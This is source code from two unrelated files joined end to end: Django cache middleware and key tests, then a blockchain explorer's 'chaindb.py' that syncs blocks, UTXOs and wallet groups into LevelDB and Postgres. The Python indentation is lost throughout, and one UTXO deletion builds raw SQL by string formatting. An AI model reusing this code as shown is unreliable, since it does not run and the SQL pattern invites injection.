self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertEqual(get_cache_data, None)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data, None)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertEqual(result, None)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertNotEqual(result, None)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertEqual(result, None)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertNotEqual(result, None)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the Etag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = TemplateResponse(HttpResponse(), Template("This is a test"))
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = TemplateResponse(HttpResponse(), Template("This is a test"))
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = TemplateResponse(HttpResponse(), Template("This is a test"))
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestEtagWithAdmin(TestCase):
# See https://code.djangoproject.com/ticket/16003
urls = "admin_views.urls"
def test_admin(self):
with self.settings(USE_ETAGS=False):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertFalse(response.has_header('ETag'))
with self.settings(USE_ETAGS=True):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertTrue(cache1 is cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertFalse(c[0] is c[1])
|
chaindb.py
|
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import gevent
import base64
import string
import struct
import os, sys
import bitcoin
import binascii
import io
import json
import threading
import socketio
from gevent.lock import BoundedSemaphore
from shared import settings
from datetime import datetime
from sync.cache import Cache
from shared.models import Block, Transaction, Address, AddressChanges, Utxo, Message, db, WalletGroup, WalletGroupAddress, WalletGroupAddressMerge
from bitcoin.messages import msg_block, MsgSerializable
from bitcoin.core import b2lx, lx, uint256_from_str, CBlock
from bitcoin.core.serialize import uint256_from_str, uint256_to_str, uint256_from_compact
from bitcoin.wallet import CBitcoinAddress
from bitcoin.core.script import CScript
from bitcointx.wallet import CBitcoinAddress as TX_CBitcoinAddress
from datetime import datetime, timedelta
if not os.path.exists('/data/explorer/blocks/'):
os.makedirs('/data/explorer/blocks/')
if not os.path.exists('/data/explorer/chainstate/'):
os.makedirs('/data/explorer/chainstate')
from wallet_group.group import WalletGrouper
# connect to the redis queue as an external process
external_sio = socketio.RedisManager('redis://%s' % settings.REDIS_HOST, write_only=True)
def int_to_bytes(i: int, *, signed: bool = False) -> bytes:
length = (i.bit_length() + 7 + int(signed)) // 8
return i.to_bytes(length, byteorder='big', signed=signed)
def bytes_to_int(b: bytes, *, signed: bool = False) -> int:
return int.from_bytes(b, byteorder='big', signed=signed)
def ser_uint256(i):
return uint256_to_str(i)
class TxIdx(object):
def __init__(self, blkhash, spentmask=0):
self.blkhash = blkhash
self.spentmask = spentmask
class BlkMeta(object):
def __init__(self):
self.height = -1
self.work = 0
def deserialize(self, s):
s = s.decode('utf-8')
l = s.split()
if len(l) < 2:
raise RuntimeError
self.height = int(l[0])
self.work = int(l[1], 16)
def serialize(self):
r = str(self.height) + ' ' + hex(self.work)
return r.encode()
def __repr__(self):
return "BlkMeta(height %d, work %x)" % (self.height, self.work)
class HeightIdx(object):
def __init__(self):
self.blocks = []
def deserialize(self, s):
s = s.decode('utf-8')
self.blocks = []
l = s.split()
for hashstr in l:
hash = lx(hashstr)
self.blocks.append(hash)
def serialize(self):
l = []
for blkhash in self.blocks:
l.append(b2lx(blkhash))
return (' '.join(l)).encode()
def __repr__(self):
return "HeightIdx(blocks=%s)" % (self.serialize(),)
class ChainDb(object):
def __init__(self, log, mempool, params):
self.log = log
self.mempool = mempool
self.params = params
self.utxo_changes = 0
self.cache = Cache()
self.cache.clear()
## level DB
# pg_block: block data to insert into PG database
# pg_tx: transaction data to insert into PG database
# tx:* transaction outputs
# misc:* state
# height:* list of blocks at height h
# blkmeta:* block metadata
# blocks:* block seek point in stream
datadir = '/data/explorer/blocks/'
self.db = self.cache.db
self.blk_write = io.BufferedWriter(io.FileIO(datadir + '/blocks.dat','ab'))
self.blk_read = io.BufferedReader(io.FileIO(datadir + '/blocks.dat','rb'))
if self.db.get(b'misc:height') is None:
self.log.info('INITIALIZING EMPTY BLOCKCHAIN DATABASE')
with self.db.write_batch(transaction=True) as batch:
batch.put(b'misc:height', struct.pack('i', -1))
batch.put(b'misc:msg_start', self.params.NETMAGIC)
batch.put(b'misc:tophash', ser_uint256(0))
batch.put(b'misc:total_work', b'0x0')
start = self.db.get(b'misc:msg_start')
if start != self.params.NETMAGIC:
self.log.error("Database magic number mismatch. Data corruption or incorrect network?")
raise RuntimeError
self.block_lock = BoundedSemaphore()
self.address_changes = {}
self.address_change_count = 0
self.transaction_change_count = 0
self.utxo_cache = {}
self.tx_lock = False
self.initial_sync = True
self.wallet_group = WalletGrouper('/data/explorer/wallets')
self.checktransactions(True)
self.checkaddresses(True)
self.checkblocks(0, True)
self.checkutxos(True)
self.orphans = {}
self.orphan_deps = {}
if Block.select().count(None) == 0:
self.log.info('Initialising genesis block')
self.putblock(self.params.GENESIS_BLOCK)
def locate(self, locator):
return 0
def gettophash(self):
return self.db.get(b'misc:tophash')
def getlocator(self):
vHave = [self.gettophash()]
height = struct.unpack('i', self.db.get(b'misc:height'))[0]
if height > 25:
data = self.db.get(('height:%s' % (height - 25)).encode())
heightidx = HeightIdx()
heightidx.deserialize(data)
vHave = vHave + heightidx.blocks
return vHave
# def haveblock(self, sha256, _):
# return False
def getheight(self):
d = self.db.get(b'misc:height')
return struct.unpack('i', d)[0]
def pututxo(self, txid, vout, address, value, wb=None, scriptPubKey=None, blockHeight=None):
key = ('%s:%s' % (txid, vout)).encode()
data = ('%s:%s' % (address, value)).encode()
self.utxo_cache[key] = data
self.utxo_changes += 1
if wb:
wb.put(('pg_utxo_put:%s:%s' % (txid, vout)).encode(), ('%s:%s:%s:%s' % (address, value, scriptPubKey, blockHeight)).encode())
def getutxo(self, txid, vout):
key = ('%s:%s' % (txid, vout)).encode()
if key in self.utxo_cache:
r = self.utxo_cache[key]
else:
r = self.db.get(key)
r = r.decode("utf-8").split(':')
return (r[0], int(r[1]))
def poputxo(self, wb, txid, vout):
key = ('%s:%s' % (txid, vout)).encode()
if key in self.utxo_cache:
r = self.utxo_cache[key]
del self.utxo_cache[key]
else:
r = self.db.get(key)
wb.delete(key)
r = r.decode("utf-8").split(':')
wb.put(('pg_utxo_del:%s:%s' % (txid, vout)).encode(), b'')
self.utxo_changes += 1
return (r[0], int(r[1]))
def _committransactions(self):
if self.tx_lock:
return
self.tx_lock = True
count = 0
loop = False
first = True
try:
while loop or first:
first = False
self.log.debug('Commiting transaction updates')
with self.db.write_batch(transaction=True) as deleteBatch:
transactions = []
with self.db.snapshot() as sn:
for key, value in sn.iterator(prefix=b'pg_tx:'):
txid = key.decode('utf-8').split(':')[1]
count += 1
data = json.loads(value.decode('utf-8'))
transactions.append({
"txid": txid,
"vin": data["vin"],
"vout": data["vout"],
"input_value": data["input_value"],
"output_value": data["output_value"],
"block": data["block"],
"block_height": data["block_height"],
"addresses_out": data["addresses_out"],
"addresses_in": data["addresses_in"],
"timestamp": datetime.fromtimestamp(data["timestamp"]),
})
deleteBatch.delete(key)
if count > 20000:
count = 0
loop = True
break
if len(transactions) > 0:
if not self.initial_sync:
for tx in transactions:
for addr, value in tx['addresses_out'].items():
external_sio.emit(addr, tx, room=addr)
for addr, value in tx['addresses_in'].items():
external_sio.emit(addr, tx, room=addr)
Transaction.insert_many(transactions).execute(None)
self.transaction_change_count -= count
finally:
self.tx_lock = False
self.log.debug('Transaction update complete')
def checktransactions(self, force=False):
if not force and (self.tx_lock or self.transaction_change_count < 500):
return
t = threading.Thread(target=self._committransactions)
t.daemon = True
t.start()
def checkaddresses(self, force=False):
if force or self.address_change_count > 10000:
self.log.debug('Commiting address balance updates')
sys.stdout.flush()
changes_list = []
self.address_change_count = 0
with self.db.write_batch(transaction=True) as deleteBatch:
for key, value in self.db.iterator(prefix=b'address:'):
balance, sent, received = struct.unpack('lll', value)
address = key.decode('utf-8').split(':')[1]
changes_list.append({'address': address, 'balance_change': balance, 'sent_change': sent, 'received_change': received})
deleteBatch.delete(key)
if len(changes_list) > 0:
AddressChanges.insert_many(changes_list).execute(None)
db.execute_sql("""
INSERT INTO address (address, balance, sent, received)
(SELECT address, sum(balance_change) as balance_change, sum(sent_change) as sent_change, sum(received_change) as received_change
FROM addresschanges GROUP BY address)
ON CONFLICT(address) DO
UPDATE SET balance = address.balance + EXCLUDED.balance, sent = address.sent + EXCLUDED.sent, received = address.received + EXCLUDED.received;
TRUNCATE addresschanges;
""")
def checkblocks(self, height, force=False):
if force or height % 300 == 0:
self.log.debug('Commit blocks')
blocks = []
hashes = []
with self.db.write_batch(transaction=True) as deleteBatch:
for key, value in self.db.iterator(prefix=b'pg_block:'):
data = json.loads(value.decode('utf-8'))
hashes.append(data['hash'])
data['version'] = struct.pack('>i', data['version'])
data['bits'] = struct.pack('>i', data['bits'])
data['coinbase'] = base64.decodebytes(data['coinbase'].encode())
data['timestamp'] = datetime.fromtimestamp(data['timestamp'])
data['chainwork'] = int_to_bytes(data['chainwork'])
blocks.append(data)
deleteBatch.delete(key)
if blocks:
if not self.initial_sync:
for block in blocks:
b = Block.create(**block)
external_sio.emit('block', b.to_json(), room='inv')
else:
Block.insert_many(blocks).execute(None)
with self.db.write_batch(transaction=True) as deleteBatch:
with self.db.snapshot() as sn:
wallets = []
walletsAddress = []
for key, value in sn.iterator(prefix=b'walletCreate:'):
addr = key.decode().split(':')[1]
uid = value.decode()
wallets.append({
'uid': uid
})
walletsAddress.append({
'wallet': uid,
'address': addr,
})
deleteBatch.delete(key)
self.log.info('PG wallet create %s for %s' % (uid, addr))
if wallets:
WalletGroup.insert_many(wallets).on_conflict_ignore().execute(None)
for key, value in sn.iterator(prefix=b'walletAdd:'):
addr = key.decode().split(':')[1]
walletsAddress.append({
'wallet': value.decode(),
'address': addr,
})
self.log.info('PG wallet add %s for %s' % (value.decode(), addr))
deleteBatch.delete(key)
if walletsAddress:
WalletGroupAddress.insert_many(walletsAddress).execute(None)
for key, value in sn.iterator(prefix=b'walletMerge:'):
existingWalletId = key.decode().split(':')[1]
newWalletId = value.decode()
deleteBatch.delete(key)
res = WalletGroupAddress.update(wallet = newWalletId).where(WalletGroupAddress.wallet == existingWalletId).execute(None)
self.log.info('PG wallet merge from %s to %s (%s)' % (existingWalletId, newWalletId, res))
# if walletsMerge:
# WalletGroupAddressMerge.insert_many(walletsMerge).execute(None)
# db.execute_sql("INSERT INTO walletgroupaddress (wallet, address) (SELECT wallet, address FROM walletgroupaddressmerge) ON CONFLICT (address) DO UPDATE SET wallet = EXCLUDED.wallet; TRUNCATE walletgroupaddressmerge")
def checkutxos(self, force=False):
if force or self.utxo_changes > 10000:
self.log.debug('Commit utxo changes')
utxos = []
#wb.put(('pg_utxo_put:%s:%s' % (txid, vout)).encode(), ('%s:%s:%s:%s' % (address, value, scriptPubKey, blockHeight)).encode())
with self.db.write_batch(transaction=True) as deleteBatch:
for key, value in self.db.iterator(prefix=b'pg_utxo_put:'):
key_parts = key.decode().split(':')
txid = key_parts[1]
vout = key_parts[2]
try:
(address, value, scriptPubKey, blockHeight) = value.decode().split(':')
except:
raise
utxos.append({
'txid': txid,
'vout': vout,
'address': address,
'scriptPubKey': scriptPubKey,
'block_height': blockHeight,
'amount': value
})
deleteBatch.delete(key)
if utxos:
Utxo.insert_many(utxos).execute(None)
utxos = []
with self.db.write_batch(transaction=True) as deleteBatch:
for key, value in self.db.iterator(prefix=b'pg_utxo_del:'):
key_parts = key.decode().split(':')
txid = key_parts[1]
vout = key_parts[2]
utxos.append('(\'%s\', %s)' % (txid, vout))
if utxos:
# print('Deleting utxos')
# print(utxos)
# select * from utxo join (VALUES('TE8evzF3gZoRQozJgfNzekrv7uiBgKKFiE', '001239f17dde519a4fbadb71dda3725ef7474ab2995b6466e8c079dc5c2a7865:0')) AS t(addr, t) ON addr = address and txid_vout = t;
q = 'DELETE FROM utxo WHERE id in (SELECT id FROM utxo JOIN (VALUES %s) AS t (t, v) ON t = txid AND v = vout)' % ','.join(utxos)
#Utxo.delete().where(Utxo.txid_vout.in_(utxos)).execute()
Utxo.raw(q).execute(None)
self.utxo_changes = 0
def mempool_add(self, tx):
# Do not add if not fully synced
if self.initial_sync:
return
# TODO: Transaction can get stuck in mempool if double-spent or RBF
# TODO: Add expiry from mempool? e.g. x blocks, either indicates not accepted by the network or stuck in mempool due to another issue
self.mempool.add(tx)
timestamp = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
tx_parsed = self.parse_tx(timestamp, None, None, tx)
Transaction.insert_many([tx_parsed]).execute(None)
for vin in tx.vin:
Utxo.update(spent=True).where((Utxo.txid == b2lx(vin.prevout.hash)) & (Utxo.vout == vin.prevout.n)).execute()
external_sio.emit('tx', tx_parsed, room='inv')
def mempool_remove(self, txid):
self.mempool.remove(txid)
Transaction.delete().where(Transaction.txid == txid).execute()
def parse_vin(self, tx, txid, tx_data, vin, idx, batch=None):
if tx.is_coinbase() and idx == 0:
tx_data["vin"] = [{"coinbase": b2lx(tx.vin[0].scriptSig[::-1])}]
tx_data["addresses_in"][None] = 0
return
if batch:
# TODO: remove old utxo db
preaddress, prevalue = self.poputxo(batch, b2lx(vin.prevout.hash), vin.prevout.n)
self.spend_txout(b2lx(vin.prevout.hash), vin.prevout.n, batch)
else:
preaddress, prevalue = self.getutxo(b2lx(vin.prevout.hash), vin.prevout.n)
tx_data["vin"].append({"txid": b2lx(vin.prevout.hash), "vout": vin.prevout.n, "value": prevalue})
tx_data["input_value"] += prevalue
# Add to the value of address vin
if preaddress in tx_data["addresses_in"]:
tx_data["addresses_in"][preaddress] += prevalue
else:
tx_data["addresses_in"][preaddress] = prevalue
# Update address tracking only when non-mempool (batch is not none)
if batch:
self.log.debug("Updating address %s with value %s" % (preaddress, -prevalue))
if preaddress in self.address_changes:
self.address_changes[preaddress]['balance'] -= prevalue
self.address_changes[preaddress]['sent'] += prevalue
else:
self.address_changes[preaddress] = {
'balance': -prevalue,
'sent': prevalue,
'received': 0,
}
def parse_vout(self, tx, txid, tx_data, vout, idx, batch=None, blockHeight=None):
script = vout.scriptPubKey
if len(script) >= 38 and script[:6] == bitcoin.core.WITNESS_COINBASE_SCRIPTPUBKEY_MAGIC:
return
try:
script = CScript(vout.scriptPubKey)
if script.is_unspendable():
self.log.warn("Unspendable %s" % vout.scriptPubKey)
if vout.scriptPubKey[2:4] == b'\xfe\xab':
m = vout.scriptPubKey[4:].decode('utf-8')
Message.create(message=m)
return
address = str(TX_CBitcoinAddress.from_scriptPubKey(script))
except:
self.log.warn('scriptPubKey invalid txid=%s scriptPubKey=%s value=%s' % (txid, b2lx(vout.scriptPubKey), vout.nValue))
return
value = vout.nValue
self.pututxo(txid, idx, address, value, wb=batch, scriptPubKey=vout.scriptPubKey.hex(), blockHeight=blockHeight)
tx_data["vout"].append({"address": address, "value": value, "vout": idx})
if address in tx_data["addresses_out"]:
tx_data["addresses_out"][address] += value
else:
tx_data["addresses_out"][address] = value
tx_data["output_value"] += value
# Update address tracking only when non-mempool (batch is not none)
if batch:
self.log.debug("Updating address %s with value %s" % (address, value))
if address in self.address_changes:
self.address_changes[address]['balance'] += value
self.address_changes[address]['received'] += value
else:
self.address_changes[address] = {
'balance': value,
'received': value,
'sent': 0,
}
def parse_tx(self, timestamp, bHash, bHeight, tx, batch=None):
txid = b2lx(tx.GetTxid())
tx_data = {
"txid": txid,
"vout": [],
"vin": [],
"input_value": 0,
"output_value": 0,
"block": bHash,
"block_height": bHeight,
"addresses_in": {},
"addresses_out": {},
"timestamp": timestamp
}
for idx, vin in enumerate(tx.vin):
self.parse_vin(tx, txid, tx_data, vin, idx, batch)
for idx, vout in enumerate(tx.vout):
self.parse_vout(tx, txid, tx_data, vout, idx, batch, blockHeight=bHeight)
if batch:
batch.put(('pg_tx:%s' % txid).encode(), json.dumps(tx_data).encode())
self.transaction_change_count += 1
# connect inputs to wallet group tree
addrs = list(map(lambda x: x[0], tx_data['addresses_in'].items()))
self.wallet_group.connect_input(batch, addrs)
return tx_data
def parse_vtx(self, vtx, wb, timestamp, bHash, bHeight):
neverseen = 0
for tx in vtx:
txid = b2lx(tx.GetTxid())
if not self.mempool_remove(txid):
neverseen += 1
txidx = TxIdx(b2lx(bHash))
if not self.puttxidx(txid, txidx, batch=wb):
self.log.warn("TxIndex failed %s" % (txid,))
return False
tx_parsed = self.parse_tx(timestamp, b2lx(bHash), bHeight, tx, wb)
# Emit coinbase transactions
if not self.initial_sync and tx.is_coinbase():
external_sio.emit('tx', tx_parsed, room='inv')
